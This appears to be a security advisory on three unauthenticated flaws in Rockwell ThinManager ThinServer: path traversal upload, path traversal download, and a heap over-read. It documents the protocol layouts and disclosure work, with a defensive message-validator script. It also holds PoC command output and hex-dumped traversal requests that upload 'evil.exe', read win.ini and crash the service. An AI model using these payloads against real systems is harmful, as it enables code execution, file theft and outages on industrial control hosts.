There are multiple vulnerabilities in Rockwell Automation ThinManager ThinServer.exe.
Affected Versions:
- 6.x - 10.x
- 11.0.0 - 11.0.5
- 11.1.0 - 11.1.5
- 11.2.0 - 11.2.6
- 12.0.0 - 12.0.4
- 12.1.0 - 12.1.5
- 13.0.0 - 13.0.1
CVE-2023-27855 - ThinManager ThinServer Path Traversal Upload
(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
A client message sent to a synchronization thread in ThinServer.exe has the following structure:
// be = big endian
struct header
{
be16 type; // msg type
be16 flags; // msg flags
// 0x0001 - request
// 0x0002 - response
// 0x8000 - ?
be32 len; // msg body length
};
struct msg
{
header hdr;
byte data[hdr.len]; // format depends on hdr.type
};
struct msg_7_35
{
header hdr; // hdr.type must be 7 or 35
be32 unk;
string file_name; // null-terminated string
string file_type;
string unk;
string unk; // present only in msg 35
be32 flen; // number of bytes in the fdata field
byte fdata[flen]; // data to write to file_name
};
A path traversal exists (via the file_name field) when processing a message of type 7 or 35 (SYNC_MSG_SEND_FILE). An unauthenticated remote attacker can exploit this to upload arbitrary files to any directory on the disk drive where ThinServer.exe is installed. The attacker can overwrite existing executable files with attacker-controlled, malicious contents, potentially causing remote code execution.
POC:
A Proof of Concept exploit for this vulnerability was created by Tenable Research. Below is example output for PoC execution against a vulnerable target.
Example output:
# echo -n 'malicious file contents' > /tmp/malicious_file_contents
# python3 thinserver_path_traversal_file_upload.py -t -f /tmp/malicious_file_contents -n '\Program Files\Rockwell Software\ThinManager\evil.exe'
[-- req --]
00000000: 00 01 00 00 ....
[-- res --]
00000000: 00 04 00 01 00 00 00 08 00 00 28 93 54 6B BB 3F ..........(.Tk.?
Uploading local file /tmp/malicious_file_contents as \Program Files\Rockwell Software\ThinManager\evil.exe on the remote host.
Please check if the file has been uploaded.
CVE-2023-27856 - ThinManager ThinServer Path Traversal Download
(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
Message 8 sent by the client has the following structure:
struct msg_8
{
header hdr; // hdr.type must be 8
be32 unk;
string file_name; // null-terminated string
};
A path traversal exists (via the file_name field) when processing a message of type 8. An unauthenticated remote attacker can exploit this to download arbitrary files on the disk drive where ThinServer.exe is installed.
POC:
A Proof of Concept exploit for this vulnerability was created by Tenable Research. Below is example output for PoC execution against a vulnerable target.
Example output:
# python3 thinserver_path_traversal_file_download.py -t -f '\Windows\win.ini'
[-- req --]
00000000: 00 01 00 00 ....
[-- res --]
00000000: 00 04 00 01 00 00 00 08 00 00 50 68 2F A1 BF 3F ..........Ph/..?
[-- req --]
00000000: 00 08 00 01 00 00 00 30 00 00 00 AA 2E 2E 5C 2E .......0......\.
00000010: 2E 5C 2E 2E 5C 2E 2E 5C 2E 2E 5C 2E 2E 5C 2E 2E .\..\..\..\..\..
00000020: 5C 2E 2E 5C 2E 2E 5C 5C 57 69 6E 64 6F 77 73 5C \..\..\\Windows\
00000030: 77 69 6E 2E 69 6E 69 00 win.ini.
[-- res (up to 4096 bytes) --]
00000000: 00 08 00 02 00 00 00 64 00 00 00 AA 00 00 00 5C .......d.......\
00000010: 3B 20 66 6F 72 20 31 36 2D 62 69 74 20 61 70 70 ; for 16-bit app
00000020: 20 73 75 70 70 6F 72 74 0D 0A 5B 66 6F 6E 74 73 support..[fonts
00000030: 5D 0D 0A 5B 65 78 74 65 6E 73 69 6F 6E 73 5D 0D ]..[extensions].
00000040: 0A 5B 6D 63 69 20 65 78 74 65 6E 73 69 6F 6E 73 .[mci extensions
00000050: 5D 0D 0A 5B 66 69 6C 65 73 5D 0D 0A 5B 4D 61 69 ]..[files]..[Mai
00000060: 6C 5D 0D 0A 4D 41 50 49 3D 31 0D 0A l]..MAPI=1..
CVE-2023-27857 - ThinManager ThinServer Heap-Based Buffer Overflow
(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
A heap-based buffer over-read condition occurs when the msg_7_35.flen field indicates more data than present in the msg_7_35.fdata field. An unauthenticated remote attacker can exploit this vulnerability to:
- Create a large number of tmp files in C:\ProgramData\Rockwell Software\ThinManager\tmp\
- Cause memory contents after the fdata field to be written to the tmp files, which can then be downloaded by exploiting the path traversal download vulnerability (CVE-2023-27856) above
- Crash ThinServer.exe due to a read access violation.
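As an added example (not part of Tenable's advisory or PoC tooling, and not ThinServer's own code), the following Python parser decodes a client message using the header, msg_7_35 and msg_8 layouts given above and performs the two checks a hardened server or a network sensor would want: it flags a file_name that contains ".." components or is an absolute path (the traversal behind CVE-2023-27855 and CVE-2023-27856), and it compares flen against the fdata bytes actually present so that an inconsistent length (CVE-2023-27857) is reported rather than read past. The first sample is the type 8 request captured in the download PoC output above; the two type 7 messages, the file name report.txt, the Report type and the problem strings are constructed for this example.

```python
"""Defender-side validator for ThinServer synchronization messages.

Layouts follow the header / msg_7_35 / msg_8 structures in the advisory.
Everything else (Report, problem strings, sample messages other than the
captured one) is this example's own construction.
"""
import struct
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

HEADER_LEN = 8             # be16 type, be16 flags, be32 len
SEND_FILE_TYPES = (7, 35)  # SYNC_MSG_SEND_FILE; type 35 carries one extra string
GET_FILE_TYPE = 8          # file download request


@dataclass
class Report:
    msg_type: int
    flags: int
    file_name: Optional[str] = None
    problems: List[str] = field(default_factory=list)


def _cstring(body: bytes, off: int) -> Tuple[str, int]:
    """Read a NUL-terminated string at `off`; return (text, offset after NUL)."""
    end = body.find(b"\x00", off)
    if end < 0:
        raise ValueError("unterminated string at offset %d" % off)
    return body[off:end].decode("latin-1"), end + 1


def file_name_problems(name: str) -> List[str]:
    """Flag a file_name that would escape the server's intended directory."""
    problems = []
    parts = name.replace("/", "\\").split("\\")
    if ".." in parts:
        problems.append("file_name contains '..' component")
    if name.startswith(("\\", "/")) or (len(name) >= 2 and name[1] == ":"):
        problems.append("file_name is an absolute path")
    return problems


def inspect_message(raw: bytes) -> Report:
    """Decode one client message and collect every validation problem found."""
    if len(raw) < HEADER_LEN:
        raise ValueError("message shorter than header")
    msg_type, flags, length = struct.unpack(">HHI", raw[:HEADER_LEN])
    body = raw[HEADER_LEN:]
    report = Report(msg_type, flags)
    if length != len(body):
        report.problems.append(
            "hdr.len=%d but %d body bytes present" % (length, len(body)))
    if msg_type not in SEND_FILE_TYPES and msg_type != GET_FILE_TYPE:
        return report  # other message types are not inspected here
    try:
        off = 4  # skip the leading be32 unk field
        report.file_name, off = _cstring(body, off)
        report.problems += file_name_problems(report.file_name)
        if msg_type in SEND_FILE_TYPES:
            # file_type, unk and, for msg 35 only, a second unk string
            for _ in range(3 if msg_type == 35 else 2):
                _, off = _cstring(body, off)
            (flen,) = struct.unpack(">I", body[off:off + 4])
            off += 4
            available = len(body) - off
            if flen > available:  # the over-read condition from CVE-2023-27857
                report.problems.append(
                    "flen=%d exceeds %d bytes of fdata present (over-read)"
                    % (flen, available))
    except (ValueError, struct.error) as exc:
        report.problems.append("malformed body: %s" % exc)
    return report


# Type 8 request as captured in the advisory's download PoC output.
CAPTURED_MSG_8 = bytes.fromhex(
    "00 08 00 01 00 00 00 30 00 00 00 AA 2E 2E 5C 2E"
    "2E 5C 2E 2E 5C 2E 2E 5C 2E 2E 5C 2E 2E 5C 2E 2E"
    "5C 2E 2E 5C 2E 2E 5C 5C 57 69 6E 64 6F 77 73 5C"
    "77 69 6E 2E 69 6E 69 00")

# Constructed type 7 message whose flen claims far more fdata than follows.
CONSTRUCTED_MSG_7_OVERREAD = (
    b"\x00\x07\x00\x01\x00\x00\x00\x28"    # type 7, request, len 40
    + b"\x00\x00\x00\x00"                  # unk
    + b"report.txt\x00" + b"txt\x00" + b"\x00"
    + b"\x00\x00\x10\x00"                  # flen = 4096
    + b"A" * 16)                           # only 16 bytes of fdata present

# Constructed type 7 message that is internally consistent.
CONSTRUCTED_MSG_7_OK = (
    b"\x00\x07\x00\x01\x00\x00\x00\x1b"    # type 7, request, len 27
    + b"\x00\x00\x00\x00"
    + b"report.txt\x00" + b"txt\x00" + b"\x00"
    + b"\x00\x00\x00\x03" + b"abc")        # flen = 3, 3 bytes of fdata


if __name__ == "__main__":
    for label, raw in (("captured msg 8", CAPTURED_MSG_8),
                       ("constructed msg 7 over-read", CONSTRUCTED_MSG_7_OVERREAD),
                       ("constructed msg 7 benign", CONSTRUCTED_MSG_7_OK)):
        r = inspect_message(raw)
        print("%-28s type=%-2d file_name=%r %s"
              % (label, r.msg_type, r.file_name, r.problems or "ok"))
```

The checks are deliberately ordered so that the header length is compared before any body field is touched, and every string read is bounds-checked; a message whose body ends before a NUL or before the four flen bytes is reported as malformed instead of raising past the parser.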
POC:
A Proof of Concept exploit for this vulnerability was created by Tenable Research. Below is example output for PoC execution against a vulnerable target.
Example output:
# python3 thinserver_sendfile_dos.py -t
Connection 1
Connection 2
Connection 3
Connection 4
Traceback (most recent call last):
File "/work/0day/thinserver_sendfile_dos.py", line 33, in <module>
s.connect((target, port))
ConnectionRefusedError: [Errno 111] Connection refused
After restarting ThinServer.exe
# python3 thinserver_path_traversal_file_download.py -t -f '\ProgramData\Rockwell Software\ThinManager\tmp\tmpinstallfile_0'
[-- req --]
00000000: 00 01 00 00 ....
[-- res --]
00000000: 00 04 00 01 00 00 00 08 00 00 00 BE 84 F6 62 3F ..............b?
[-- req --]
00000000: 00 08 00 01 00 00 00 5F 00 00 00 AA 2E 2E 5C 2E ......._......\.
00000010: 2E 5C 2E 2E 5C 2E 2E 5C 2E 2E 5C 2E 2E 5C 2E 2E .\..\..\..\..\..
00000020: 5C 2E 2E 5C 2E 2E 5C 5C 50 72 6F 67 72 61 6D 44 \..\..\\ProgramD
00000030: 61 74 61 5C 52 6F 63 6B 77 65 6C 6C 20 53 6F 66 ata\Rockwell Sof
00000040: 74 77 61 72 65 5C 54 68 69 6E 4D 61 6E 61 67 65 tware\ThinManage
00000050: 72 5C 74 6D 70 5C 74 6D 70 69 6E 73 74 61 6C 6C r\tmp\tmpinstall
00000060: 66 69 6C 65 5F 30 00 file_0.
[-- res (up to 4096 bytes) --]
00000000: 00 08 00 02 00 05 D0 08 00 00 00 AA 00 05 D0 00 ................
00000010: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020: 00 00 00 78 35 9C A0 F9 7F 00 00 D0 F1 92 A0 F9 ...x5...........
00000030: 7F 00 00 10 8F A2 02 00 00 00 00 01 00 00 00 00 ................
00000040: 00 00 00 01 00 00 00 00 00 00 00 10 00 00 00 00 ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060: 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000070: 00 00 00 FC C3 08 0F 00 1E 00 80 5C 00 3F 00 3F ...........\.?.?
00000080: 00 5C 00 43 00 3A 00 5C 00 50 00 72 00 6F 00 67 .\.C.:.\.P.r.o.g
00000090: 00 72 00 61 00 6D 00 44 00 61 00 74 00 61 00 5C .r.a.m.D.a.t.a.\
000000A0: 00 52 00 6F 00 63 00 6B 00 77 00 65 00 6C 00 6C .R.o.c.k.w.e.l.l
000000B0: 00 20 00 53 00 6F 00 66 00 74 00 77 00 61 00 72 . .S.o.f.t.w.a.r
000000C0: 00 65 00 5C 00 54 00 68 00 69 00 6E 00 4D 00 61 .e.\.T.h.i.n.M.a
000000D0: 00 6E 00 61 00 67 00 65 00 72 00 5C 00 54 00 4D .n.a.g.e.r.\.T.M
000000E0: 00 48 00 69 00 73 00 74 00 6F 00 72 00 79 00 2E .H.i.s.t.o.r.y..
000000F0: 00 64 00 62 00 2D 00 6A 00 6F 00 75 00 72 00 6E .d.b.-.j.o.u.r.n
00000100: 00 61 00 6C 00 00 00 00 00 00 00 00 00 00 00 00 .a.l............
00000110: 00 00 00 86 C3 02 0F F9 1F 00 90 00 00 00 00 00 ................
...snip...